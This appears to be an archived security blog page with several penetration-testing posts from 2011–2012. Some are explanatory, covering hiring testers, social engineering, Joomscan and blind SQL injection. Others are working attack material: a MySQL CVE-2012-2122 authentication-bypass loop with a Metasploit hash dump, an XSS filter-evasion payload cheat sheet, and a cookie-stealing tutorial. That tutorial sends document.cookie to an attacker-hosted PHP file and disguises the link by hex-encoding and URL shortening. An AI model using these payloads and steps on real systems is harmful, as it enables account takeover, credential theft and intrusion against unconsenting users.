Showing posts with label Penetration Testing. Show all posts
Showing posts with label Penetration Testing. Show all posts

Friday, June 22, 2012

Finding a Qualified Penetration Tester for Your Site



The penetration testing industry is enjoying an upsurge as more high-profile security breaches are reported in the media, such as the recent LinkedIn password debacle, and companies scramble to tighten up their systems. Done correctly, pen testing can illuminate security flaws in a network by utilizing the skills and viewpoint of an external third party, which in most cases, to be frank, is a great hacker.

It is the classic case of thinking like a criminal in order to catch one. A penetration tester should not be culled from the ranks of your average computer science major or CIO, as they lack the necessary "underground" experience and mentality to truly think the way professional exploiters do.

So what qualities should be looked for in a penetration tester, to find one that will think like a criminal without actually being one? Here are some hallmarks.

Extreme intelligence and problem-solving skills
A good penetration tester must be able to take disparate or incomplete data sets and, from them, fill in the gaps to discern possible attack vectors and approaches. Linear thinking is not enough — the thought process of a pen tester should allow him to take one piece of data and figure out all the ways that data can be applied in conjunction with other, seemingly unrelated data. This requires a high I.Q. and a tremendous amount of persistence.

Thinking outside the box
As security methods increase in sophistication, pen testers should be able to adapt and explore non-obvious ways to penetrate a system. This includes phishing and social engineering attacks against live staff to test real-world vulnerabilities. One could conceivably go so far as to walk around an office at night, as if one were a janitor, to discover whether login information is available on yellow Post-Its stuck on monitors.
Furthermore, thinking outside the box is required for a tester to come up with new attacks, rather than simply Google existing ones like a script kiddie.

Understands the end goal
Penetration testers should keep in mind that the end goal is not bragging rights or the simple thrill of popping a target box, but to improve the enterprise's security protocols to protect both it, and potentially millions of customers, from financial or privacy loss. As there are usually time and budget concerns, the pen tester should therefore focus on discovering the critical vulnerabilities with the highest potential impact first, then move on to secondary and tertiary layers of vulnerability.

As such, they need to demonstrate the ability to see the big picture of why a system would be attacked and what the intruder would be trying to achieve once they gain a foothold. Compromising one machine on a network would not be enough; the attack should be carried out until all further vulnerabilities now possible from that one compromised box are discovered — especially ones that lead to social security numbers, bank account information, or trade secrets — which are the areas a hacker group would most likely be targeting.

Solutions-oriented
It is not enough to infiltrate a system and report the findings. The true value of a penetration tester lies in his or her ability to provide recommendations to fix all vulnerabilities found. It is here where the hacker hat is taken off and replaced with the consultant hat to advise on the best possible solutions to lock down a network.

Pen testers should also offer follow-up tests or provide means for in-house IT staff to verify holes have been patched.

Communication skills
Lastly, a pen tester must be able to communicate in non-technical terms to executives and others reading the final report. Complex jargon and scripting recommendations should be reserved for the enterprise's IT staff, coming after a plain English summary with illustrative graphics and charts that your average business person can grasp. Try reading a sample report from the tester and seeing if you can make heads or tails from it. If not, move on.

Penetration testing is intensive work. Anyone can use software to scan for common vulnerabilities, but only a real pro can go beyond the automated tests and delve into the nooks and crannies, just like a live, criminal hacker gang would.

Author Bio
John Dayton is a freelance writer who contributes to LWG Consulting, a company that provides forensic consulting services, including computer security.
Continue   Reading>>

Tuesday, June 12, 2012

CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB


The news about the vulnerability in MySQL and MariaDB spreads like a wild fire. I have covered about this vulnerability in E Hacking news as news article. Here, i am going to share the same thing from the perspective of a penetration tester.

The MySQL and MariaDB versions 5.161,5.2.11,5.3.5 and 5.5.c2 are affected version.

The vulnerability allows an attacker to access MySQL database without inputing proper authentication credentials. The vulnerability can only exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range.

According to Gokubchik the gcc build in memcmp and BSD libc are safe bu the linux glibc sse-optimised memcmp is not safe.

Not all linux distros are affected, only the following systems are vulnerable:
*ubuntu linux 64 bit(10.04,11.10,11.04,12.04)
*openSUSE 12.1 64 bit MySQL 5.5.23-log
*Debin Unstable 64 bit 5.5.23.2
*Fedora
*Arch Linux

In order to test the vulnerability, run the followoing bash script:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.12>/dev/null; done

The above code will provide access to an affectte MySQL Server as the root user account.

The following video is provided by one of EHN reader:


Exploiting using Metasploit :
one of metasploit contributor committee a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306Authentication bypass is 10% complete
[*] 127.0.0.1:3306Authentication bypass is 20% complete
[*] 127.0.0.1:3306Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Continue   Reading>>

Wednesday, May 2, 2012

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial


So far i have explained about the Traditional Cross site scripting that occurs because of insecure server-side code. In this post , i am going to explain the DOM Based Cross Site Scripting vulnerability. if you don't know what is cross site scripting , then i recommend you to read the basics from here.

Before explaining about the DOM based xss, let me explain what DOM means to.

What is DOM?
DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.

<html> 
<head>
</head>
<body>
     <script>
var pos=document.URL.indexOf("BTSinput=")+9;  //finds the position of value 
var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable
document.write(unescape(userInput)); //writes content to the webpage
  </script>
</body>
</html>

If you know HTML and Javscript, understanding the above code is a piece of cake.

In the above example, the javascript code gets value from the url parameter "BTSinput" and writes the value in our webpage.

For example, if the url is
               www.BreakThesecurity.com/PenTesting?BTSinput=default
The webpage will display "default" as output.


Did you notice ?! The part of the webpage is not written by Server-side script.  The client side script modifies the content dynamically based on the input.   Everything done with the help of DOM object 'document'.

DOM Based XSS vulnerability:
When a developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code. 

In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url. 

An attacker with malicious intention can inject a xss vector instead .  For example:

www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>




As i said earlier, the document.write function simply writes the value of BTSinput parameter in the webpage.  So it will write the '<script>alert("BreakTheSec")</script>' in the webpage without sanitizing.  This results in running the script code and displays the alert box.


Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.

Reference:
http://www.rapid7.com/vulndb/lookup/http-client-side-xss

Continue   Reading>>

Wednesday, April 4, 2012

The Art of Human Hacking -Social Engineering(SE) tutorial series



Hello BTS readers, here we come with an interesting tutorial written by my friend Mr.Ashish Mistry who is the founder of Hcon and author of 'HconSTF ' project.


Hello all,

after a long time I am again started writing, In a hope that my believe in “sharing the spirit of learning” fulfills well. So from today I am going to write series of tutorials on my favorite topic, 'Social Engineering' (SE).

starting from small intro to very basics of what SE is, why should you learn and use it, How it works, and as we go on further in this series, we will look at 'leveraging SE into penetration testing'.

Disclaimer: All the examples used in the tutorials series are some of my own and some of from the random pick from internet and Social-net, so if any of the example accidentally meets your situation than, no one can held me responsible for anything in any regards what so ever. This are just for examples and totally educational purpose and I am not in an intention to offense anyone or anything.
This tutorials are for educational purpose only, only you as reader is responsible for whatever you do with this material published here and not the author and not the site.

So lets we begin with the first tutorial on SE,

what is social engineering???
Its an art of manipulating humans.
In more easy words 'tricking people so, they do what YOU want from them or get done by them'.

got confused??

Lets take one example:
suppose you go to some toyshop with your child, and your child want a toy car, so he asks to the sales person to show a car or any one he has may be seen from the display. So that sales person shows that car or always starts with a costly car so when the boy saw the car he asks for to take that car only because the sales person showed some features like lights and remote and all. But the toy car is too costly for your this month's budget and boy wants it anyhow, so you try to divert the child to some other little more in your budget car, as he is a small child so he does not listens to you and at the end of all this,
either you buy that costly car child wanted or he didn't get anything or some other car.

Now you might ask me “So whats new in this? Its very normal every child does it right???” but my point of this example is to explain a perfectly crafted and executed 'social engineering attack' in our day to day life.
In above example the social engineer was the shop's sales person who used the child to sell a costly car and have more money from you.

Basically the sales person targeted the nature of that child because he knows that once it is showed what a child wants than its very difficult for the parents to divert the child so he can sell as HE wanted.

So if you understand basic exploitation terms than,
  • Attacker = the sales person
  • Vulnerability (weakness) = child (actually the obvious nature)
  • Exploit (trick) = showing more costly car and showing more features of it to gain more attention of the child
  • Payload (purpose) = more money from you
  • Target = yes you guessed it right its YOU :)


Lets take another example:

This one is simple but real world example from Facebook,
a person shared this image of a quote from honorable Mr. APJ Abdul kalam.

Its good right ?? he is proud of him or liked the quote right ??
but lets now try to understand it by SE point of view.
there are some things to note down in the photograph
1. on the image - one website address is there
2. below the image again the website address is written

First let me tell you that the web address was not from any government site but a private product trading site which is totally unrelated to what the image is and marking the image with it is such a disrespect done by the person, anyways
so why anyone would do like this ??

a very simple but cleaver kind of SE here
  • Attacker = who initially edited this photo with web address
  • Vulnerability (weakness) = human nature of sharing and liking good photos/quotes
  • Exploit (trick) = the edited photo which has quote
  • Payload (purpose) = marketing of his web site, and reaching some more audience for business for FREE
  • Target = any one on Facebook who shares this photo

Another noticeable point is that if you see anything which is liked by your mind, it gets stored somewhere in your mind so when anyone around you ask or talk about any property or trading things, your mind might flashes about this site.
now after this example lets refine and add to our previous simple definition of SE.

"Its an art of manipulating people so that they do as you want or give you what you want from them. Without any kind of physical offense, Its a whole psychological process of targeting other peoples mind to gain their TRUST and exploiting it and using human weaknesses against target by crafting SE attacks by the kind of work we want to get done by others"

Hopefully now you must have got the idea of social engineering (SE), and some things to start understanding and observing it. but yes every human and its psychological behavior will be different, by studying your target and crafting attack according to you goal will going to give more success.for this one of the key thing is observation and quick responsive abilities if the attacker or social engineer.

So who can be considered as social engineers??
it can be anyone from your relative/friend, convincing you to do or believe what they say even if you don't want do do it or believe it.

It can be sales person, marketing parsons, thief/con artist, your boss, penetration testers, forensics experts or anyone around you !!

More on it, its not a new thing but it used from centuries by different people, even if you consider any historical persons from your nation.

Think on it, might be you had been social engineered by someone??? some where ??

Thats all for this first introductory tutorial.
If you have any Questions or want to give any feedback or anything you want to get explained in this tutorial series than please post in comments.


Article author: Ashish Mistry
Article license: Social Engineering tutorials series by Ashish Mistry is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.
Continue   Reading>>

Tuesday, February 7, 2012

Complete Cross site Scripting(XSS) cheat sheets : Part 1


I am just providing this XSS Cheat sheet after collecting the exploit-codes from hackers' techniques and different sites especially http://ha.ckers.org/xss.html .  This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters.  If you have any different cheat codes , please send your code.

Basic XSS codes:
----------------------------------
<script>alert("XSS")</script>

<script>alert("XSS");</script>

<script>alert('XSS')</script>

"><script>alert("XSS")</script>

<script>alert(/XSS")</script>

<script>alert(/XSS/)</script>

When inside Script tag:
---------------------------------
</script><script>alert(1)</script>
‘; alert(1);
')alert(1);//


Bypassing with toggle case:
--------------------------------------
 <ScRiPt>alert(1)</sCriPt>
  <IMG SRC=jAVasCrIPt:alert('XSS')>

XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 <IMG SRC=javascript:alert('XSS')>      

<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

Bypass the script tag filtering:
--------------------------------------------------

<<SCRIPT>alert("XSS");//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

Using String.fromCharCode function:
-----------------------------------------------------
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


You can combine the above mentioned codes and make your own cheat code.

Note:
We are extending the cheat sheet.  Soon we will publish the part 2.


Continue   Reading>>

Thursday, January 26, 2012

E Hacking News & PenTest Partnership announced!




We’re proud to announce that we’ve just partnered with PenTest Magazine!
About PenTest Magazine:

PenTest Magazine is a weekly downloadable IT security mag, devoted exclusively to penetration testing. It features articles by penetration testing specialists and enthusiasts, experts in vulnerability assessment and management. We cover all aspects of pen testing, from theory to practice, from methodologies and standards to tools and real-life solutions. Each magazine features a cover focus, and articles from our regular contributors, covering IT security news and up-to-date topics.

The magazine is available by paid subscription. It is devoted to the best penetration testing services providers, who will show you the pen testing world from their perspective. It’s an excellent opportunity to observe security trends on the market for the readers, and for companies – to share their invaluable knowledge.

PenTest Magazine features 48 issues in a year – 4 issues in a month. Different title is published every week:
  • PenTest Regular – 1st of every month
  • Auditing & Standards PenTest – 7th of every month
  • PenTest Extra – 15th of every month
  • Web App Pentesting – 22nd of every month


Each week there is another leading topic of the issue. Whilst PenTest Regular is devoted to more general and overall topics, three remaining issues focus on certain problem.
Purchasing PenTest Magazine, the only publication devoted exclusively to PenTesting, you get almost 200 pages of content every month.

For any questions or inquiries please mail us at: en@pentestmag.com

Continue   Reading>>

Tuesday, January 3, 2012

How to do Cookie Stealing with Cross site Scripting Vulnerability ? : XSS Tutorials



Hope, you are now familiar with XSS vulnerability (if you don't know what it is, read the beginners xss tutorial). It is my Fourth article about the XSS Vulnerability Testing(PenTesting)..! Today i am going to explain how an attacker exploit XSS vulnerability and steal cookie from users.

Warning!!!
BTS does not take responsibility, if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting,  investigations by legal security agencies.

Requirements:
  • A cookie Stealer code : Get it from here
  • Free Web hosting service
  • Basic Knowledge about XSS
  • Basic Knowledge about Computer Cookies
Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

    Step 1: Creating Cookie Stealer PHP file
    Get the Cookie stealer from the link i mentioned.  In that post, i have explained three versions of cookie stealer.  We are going to use the third version.
    • Copy the code.
    • Open Notepad and paste the code
    • Save the file with .php extension
      Eg: Stealer.php
    Now create New file and save it as log.txt (leave it as blank). Don't change the name , this is the file name what we give in php file.

    Now you will have two files;
    1. Stealer.php
    2. log.txt

    What these two files do exactly?
    The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
    The log.txt has cookies , ip address details.

    Step 2: 
    Register in a free web-hosting service and login into your cpanel.
    Now open the File Manager in cpanel.
    Upload the Stealer.php and log.txt to root folder or public_html folder.

    Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

    Step 3: Exploiting the XSS Vulnerability
    So Far , we have sharpened our saw.  Now we are going to use it.
    Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.

    <script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

    Cookie Stealing with Non-Persistent vs Persistent XSS:
    Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don't need to send any link to others.  Whoever visit the page, they will be vicim.

    Non-Persistent:
    In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Non-persistent XSS .

    In Non-persistence, Attackers will send the injected link victims.
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

    The above link is clearly shows the scripts.  Hackers can Hex-encode this script  so that victim can't see the script.
    For Example:
    hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
    Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

    For example:
    hxxp://www.tinyexample.com/twrwd63

    Once the victim follow the link, his cookie will be stored in log.txt file.

    How to be Secure from this attack?
    • Use No-Script Addon. This is best protection to stay away from XSS 
    • Never Click the Shorten url
    • Sometime you may want to follow the shorten link.  If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)
    • (Later We will cover security tips for site admin , so stay tuned)
    Continue   Reading>>

    Sunday, December 25, 2011

    Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing



    copyrights reserved © BreakTheSecurity
    Hi friends, last time, i explained what is XSS and how an attacker can inject malicious script in your site. As i promised earlier, i am writing this advanced XSS tutorial for you(still more articles will come).

    Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.
    For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become
    <script>alert(>xss detected<)</script>
    Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only.

    1.Bypassing magic_quotes_gpc

    The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \  with a backslash automatically.
    For Eg:
    <scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.

    This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
    For Eg:  alert("hi"); can be converted to
    String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
    so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>.  In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing.  Yes, it will successfully run the script.
    String.fromCharCode() is a javascript function that converts ASCII value to Characters.

    How to convert to ASCII values?

    There are some online sites that converts to ASCII character. But i suggest you to use Hackbar Mozilla addon .

    After installing hackbar add on ,press F9.  It will open the small box above the url bar. click the XSS->String.fromCharCode()

    Now it will popup small window. enter the code for instance alert("Hi").  click ok button.  Now we got the output.

    copy the code into the <script></script> inside and insert in the vulnerable sites

    For eg: 
    hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

    2.HEX Encoding

    we can encode our whole script into HEX code so that it can't be filtered.
    For example:  <script>alert("Hi");</script> can be convert to HEX as:
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
    Now put the code in the vulnerable site request.
    For ex:
    hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
     Converting to HEX:
    This site will convert to hex code: http://centricle.com/tools/ascii-hex/

    3.Bypassing using Obfuscation

    Some website admin put the script,alert in restricted word list.  so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). 
    For eg:
    <ScRipt>ALeRt("hi");</sCRipT>

    This bypass technique rarely works but giving trial is worth.

    4. Closing Tag

    Sometimes putting "> at the beginning of the code will work.

    "><script>alert("Hi");</script>

    This will end the previous opened tag and open our script tag.
    Example:
    hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

    Conclusion:
    From above article, it is clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask PenTesters to test your application or test yourself.

    Also there are lot of different filter bypassing technique, i just covered some useful techniques for you.


    Continue   Reading>>

    Wednesday, November 23, 2011

    What is Penetration Testing and Pen Testing Distribution?


    Penetration Testing(Pen Testing) is the act of evaluating the Security of system or network by exploiting vulnerabilities. This will determine whether unauthorized or malicious activity is possible in a system. Vulnerability uncovered through the Pen Testing will be presented to the system's owner.


    Why Penetration Testing?

    • Pentetration testing can identify the vulnerabilities that is not identified by an automated vulnerability scanners.
    • Determining the feasibility of a particular set of attack vectors
    • Determining the Critical Vulerabilities .
    • Assessing the magnitude of potential business and operational impacts of successful attacks
    • Testing the ability of network defenders to successfully detect and respond to the attacks
    • Testing stability of the system against the DDOS attack.



    White Box vs Black Box vs Grey Box Testing:
    Penetration testing can be performed in different ways. The methods can be classified into three types based on the knowledge about the System being tested.

    White Box:
    In white box testing, Pen Tester know everything about the system such as source code,network diagrams, ip addressing info.

    White box testing simulates what might happen during an "inside job" or after a "leak" of sensitive information, where the attacker(malicious insider) has access to source code, network layouts, and possibly even some passwords.

    Black Box:
    Pen Tester test the system without prior knowledge about the system. This method is also known as Blind Testing . Black box testing simulates an attack from someone who is unfamiliar(malicious outsiders) with the system.

    Grey Box:
    In this method, Pen Tester partially know about the system.

    Web application penetration testing:
    This testing will be used to find the following web application vulnerabilities:

    • SQL Injection
    • XSS(Cross site Scripting)
    • Buffer overflow
    • Clickjacking
    • DDOS
    Penetration Testing Tool:
    Penetration Testing tools are used as part of a penetration test to automate certain tasks, improve testing efficiency, and discover issues that might be difficult to find using manual analysis techniques alone.

    As a Penetration Tester, you will need lot of Penetration testing tools to test the Security of system. Searching ,downloading and installing the required software may take time. You can use a Penetration Testing Distribution instead.

    What is Pen Testing Distribution?
    Penetration Testing Distribution is an open source Operating System(Derived from Linux/BSD) that combines all required application for testing the security of system. It is specially developed for Security Professionals(Pen Testers/EthicalHackers/Forensic Officers...)
    Eg: Backtrack 5 Linux .

    What is the advantage of Penetration Testing Distribution?
    All Required application for security test are gathered in a single Operating system. You don't need to search for application, Save your time. Penetration Testing Distribution are open source and free to use. You can install in pen drive and bring it anywhere.

    Continue   Reading>>

    How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?


    Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS.   The Updated version can detects 550 Vulnerabilities. Let me show how to use this joomscan in Backtrack5.

    Download the Joomscan from here:
    http://web-center.si/joomscan/joomscan.tar.gz

    Step 1: Moving to PenTest folder
    Copy/Move the downloaded files in directory
     /pentest/web/scanners/joomscan/


    Step2: Set Permission
    Now you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal(if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux).
    CHMOD 0777 joomscan.pl 


    Step 3: Update
    Update the scanner to latest version. To do this, enter the following command in Terminal:
    ./joomscan.pl update


    Step 4: Scanning for Vulnerability
    Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter the following command in Terminal:
    ./joomscan.pl -u www.YourJoomlasite.com




    Wait for a while, and it will list of the vulnerability found.

    This tutorial is completely for Educational purpose only. This tutorial is for PenTester and Ethical Hackers .
    Continue   Reading>>

    Monday, November 7, 2011

    What is Blind Sql Injection ? Web Application Vulnerability Tutorial


    Blind SQL injection technique is used when the web application is vulnerable but the output doesn’t display to the attacker. When hacker tries SQL injection, they will redirect to some other pages instead of error message. Blind SQL Injection is harder to implement when compared with the above Traditional SQL Injection Technique, it will take more time . There are some tools for Blind SQL Injection.


    Blind SQL injection can be done by querying the database with sequence of true/false questions.

    How to detect the Blind SQL Injection Vulnerability?
    Web application gets the clients input and supplied in where clause to retrieve data from Database. For instance, let us say the web application gets id and supplied to the sql query as follows
    Statement=”select * from userinfo where id=` “+id+” ` “;
    Hope you know about where clause and compound conditions (OR, AND). OR and AND are used to combine two conditions. The attacker can find the vulnerability by entering the compound conditions as input.
    For instance, the attacker can enter id value as
    1 AND 1=1
    The above query will become
    Select * from userinfo WHERE id=1 AND 1=1
    If the page remains on the same page, then the application may be vulnerable. This type of vulnerability occurs when the developer fails to validate the data type of ID. Here we give true condition (1=1). So if use false condition (1=2), it will raise an error message. We can conclude that if the condition is true, it remains in page. If false, showing error message.

    Some Functions to be known
    The following function will be useful for Blind SQL Injection.
    substring(str, pos, length) is the function that returns the part of the String. sub string of the string is depending on the argument given to the function.

    For instance substring(“hello”,2,1) will returns ‘e’. 
    Here string is “hello”, character position is 2 (that is ‘e’), and length is 1.

    • lower(str) is the function that converts the character to lower case
    • ascii(c) is the function that converts the character to ASCII value.
    • length(str) returns the length of the string .
    • user() returns the current user(admin)
    • database() returns the database name.
    • version() retruns the version of database

    Blind Sql Injection Tools:
    When come to Blind Sql Injection vulnerability, it will time consuming process. So Automated tools are better than manual process. Here are list of Automated Tools

    Meet you at our Next Article with more details about the Blind Sql Injection Attack.

    We are providing this information as a part of our Ethical Hacking Tutorial. This article is created for understanding the Web application Vulnerability. We are not responsible for you illegal activity.


    Stop stealing Our contents . I worked harder to create an article, you simply copying from us?! I asked website owners put our site as source at the end of article. Give respect to our hard work. Otherwise we don't have any other choice than report to Google under DMCA Copyrights.
    Continue   Reading>>

    Friday, October 14, 2011

    Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability



    What is XSS?
    Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

    In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.
    Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
    It will be easy to understand XSS , if you have the following prerequisite:
    • Strong Knowledge in HTML,javascript(Reference).
    • Basic Knowledge in HTTP client-Server Architecure(Reference)
    • [optional]Basic Knowledge about server side programming(php,asp,jsp)

    XSS Attack:
    Step 1: Finding Vulnerable Website
    Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

    Step 2: Testing the Vulnerability:
    First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


    Test 1 :
    Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

    Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

    Test 2:
    Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.
    View the source of the page . Find the location where input displayed place in previous test.

    Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

    Step 3: Exploiting the vulnerability
    Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

    Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

    Types of XSS Based on persisting capability:
